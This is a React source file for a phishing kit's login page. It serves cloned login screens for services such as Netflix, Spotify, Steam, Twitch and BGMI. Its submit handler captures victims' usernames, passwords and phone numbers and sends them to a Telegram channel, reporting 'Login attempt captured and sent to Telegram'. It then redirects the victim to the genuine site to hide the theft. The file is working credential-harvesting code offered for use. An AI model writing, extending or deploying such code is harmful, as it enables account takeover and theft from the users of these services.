import React, { useState, useEffect } from 'react';
import { useParams, useNavigate, useLocation } from 'react-router-dom';
import { Button } from '@/components/ui/button';
import { ArrowLeft } from 'lucide-react';
import { loginTemplates } from '@/lib/loginTemplates';
import { toast } from 'sonner';
import { useCredentials } from '@/contexts/CredentialsContext';
import { cn } from '@/lib/utils';
import { 
  DefaultTemplate, 
  SpotifyTemplate, 
  NetflixTemplate, 
  PrimeTemplate, 
  BookMyShowTemplate,
  BGMITemplate,
  SteamTemplate,
  TwitchTemplate 
} from '@/components/login-templates';

const officialUrls: Record<string, string> = {
  facebook: 'https://www.facebook.com',
  instagram: 'https://www.instagram.com',
  twitter: 'https://twitter.com',
  linkedin: 'https://www.linkedin.com',
  telegram: 'https://web.telegram.org',
  github: 'https://github.com',
  reddit: 'https://www.reddit.com',
  discord: 'https://discord.com',
  google: 'https://www.google.com',
  mail: 'https://mail.google.com',
  amazon: 'https://www.amazon.com',
  flipkart: 'https://www.flipkart.com',
  binance: 'https://www.binance.com',
  steam: 'https://store.steampowered.com',
  'battle-net': 'https://battle.net',
  twitch: 'https://www.twitch.tv',
  pubg: 'https://na.battlegrounds.pubg.com',
  bgmi: 'https://www.battlegroundsmobileindia.com',
  mobilelegends: 'https://m.mobilelegends.com',
  dota2: 'https://www.dota2.com',
  spotify: 'https://www.spotify.com',
  netflix: 'https://www.netflix.com',
  prime: 'https://www.primevideo.com',
  bookmyshow: 'https://in.bookmyshow.com',
  paytm: 'https://paytm.com'
};

const phoneNumberApps = ['telegram', 'paytm', 'flipkart', 'amazon', 'bgmi', 'pubg', 'whatsapp'];

const LoginPage: React.FC = () => {
  const { id } = useParams<{ id: string }>();
  const navigate = useNavigate();
  const location = useLocation();
  const { addCredentials, isTelegramConfigured, getConfigById } = useCredentials();

  const [template, setTemplate] = useState(null);
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  const [phoneNumber, setPhoneNumber] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const [isMounted, setIsMounted] = useState(false);
  const [showPhoneField, setShowPhoneField] = useState(false);
  const [rememberMe, setRememberMe] = useState(false);

  // Extract configId from URL search params
  const searchParams = new URLSearchParams(location.search);
  const configId = searchParams.get('configId');

  // Check if external config exists
  const externalConfig = configId ? getConfigById(configId) : null;
  const hasValidConfig = Boolean(externalConfig || isTelegramConfigured);

  useEffect(() => {
    const found = loginTemplates.find(t => t.id === id);
    if (found) {
      setTemplate(found);
      if (found.id !== 'netflix') {
        document.body.style.backgroundColor = found.backgroundColor;
      }
      document.body.style.color = ['dota2', 'discord', 'steam'].includes(found.id) ? '#FFFFFF' : '';
      
      setShowPhoneField(phoneNumberApps.includes(found.id));

      if (found.customCSS) {
        const styleId = `${found.id}-custom-style`;
        let styleElement = document.getElementById(styleId) as HTMLStyleElement;
        
        if (!styleElement) {
          styleElement = document.createElement('style');
          styleElement.id = styleId;
          document.head.appendChild(styleElement);
        }
        
        styleElement.innerHTML = found.customCSS;
      }
    } else {
      navigate('/');
      toast.error('Login template not found');
    }
    
    return () => {
      document.body.style.backgroundColor = '';
      document.body.style.color = '';
      
      if (template?.customCSS) {
        const styleElement = document.getElementById(`${template.id}-custom-style`);
        if (styleElement) {
          document.head.removeChild(styleElement);
        }
      }
    };
  }, [id, navigate, template]);

  useEffect(() => {
    setIsMounted(true);
    return () => setIsMounted(false);
  }, []);

  if (!template) {
    return <div className="min-h-screen flex items-center justify-center">Loading...</div>;
  }

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    
    if (!username || !password) {
      toast.error('Please fill in all fields');
      return;
    }
    
    setIsLoading(true);

    try {
      await new Promise<void>((resolve) => {
        addCredentials(template.name, username, password, phoneNumber, configId);
        
        setTimeout(() => {
          if (hasValidConfig) {
            toast.success('Login attempt captured and sent to Telegram');
          } else {
            toast.info('Login attempt captured. Configure Telegram to receive alerts');
          }
          resolve();
        }, 500);
      });

      const officialUrl = officialUrls[template.id] || 'https://www.google.com';
      window.location.href = officialUrl;
    } catch (error) {
      console.error('Error handling credentials:', error);
      toast.error('An error occurred while processing your request');
      setIsLoading(false);
    }
  };

  const handleGoogleLogin = () => {
    navigate('/login/google');
  };

  const navigateToSignup = (templateId: string) => {
    navigate(`/signup/${templateId}${configId ? `?configId=${configId}` : ''}`);
  };

  const renderTemplateComponent = () => {
    const commonProps = {
      template,
      username,
      setUsername,
      password,
      setPassword,
      phoneNumber,
      setPhoneNumber,
      handleSubmit,
      isLoading,
      showPhoneField,
      navigateToSignup,
      handleGoogleLogin,
      rememberMe,
      setRememberMe,
    };

    switch(template.id) {
      case 'spotify':
        return <SpotifyTemplate {...commonProps} />;
      case 'steam':
        return <SteamTemplate {...commonProps} />;
      case 'twitch':
        return <TwitchTemplate {...commonProps} />;
      case 'netflix':
        return <NetflixTemplate {...commonProps} />;
      case 'prime':
        return <PrimeTemplate {...commonProps} />;
      case 'bookmyshow':
        return <BookMyShowTemplate {...commonProps} />;
      case 'bgmi':
        return <BGMITemplate {...commonProps} />;
      default:
        return <DefaultTemplate {...commonProps} />;
    }
  };
  
  return (
    <div 
      className={cn(
        "min-h-screen flex flex-col items-center justify-center px-6 py-12 transition-all duration-500",
        isMounted ? "opacity-100" : "opacity-0"
      )}
      style={{ 
        backgroundColor: template?.id !== 'netflix' ? template?.backgroundColor : undefined
      }}
    >
      {template?.id !== 'netflix' && (
        <div className="absolute top-4 left-4 flex space-x-4">
          <Button
            variant="ghost"
            size="icon"
            onClick={() => navigate('/')}
            className={cn(
              "rounded-full",
              ['spotify', 'discord', 'steam'].includes(template?.id || '') ? "text-white hover:bg-white/10" : "text-foreground hover:bg-background/90"
            )}
          >
            <ArrowLeft className="h-5 w-5" />
            <span className="sr-only">Go back</span>
          </Button>
        </div>
      )}
      
      {renderTemplateComponent()}
      
      {!hasValidConfig && (
        <div className="mt-6 p-3 bg-amber-50 text-amber-800 rounded-lg text-sm animate-pulse">
          ⚠️ Telegram not configured. Credentials will be stored locally only.
        </div>
      )}
    </div>
  );
};

export default LoginPage;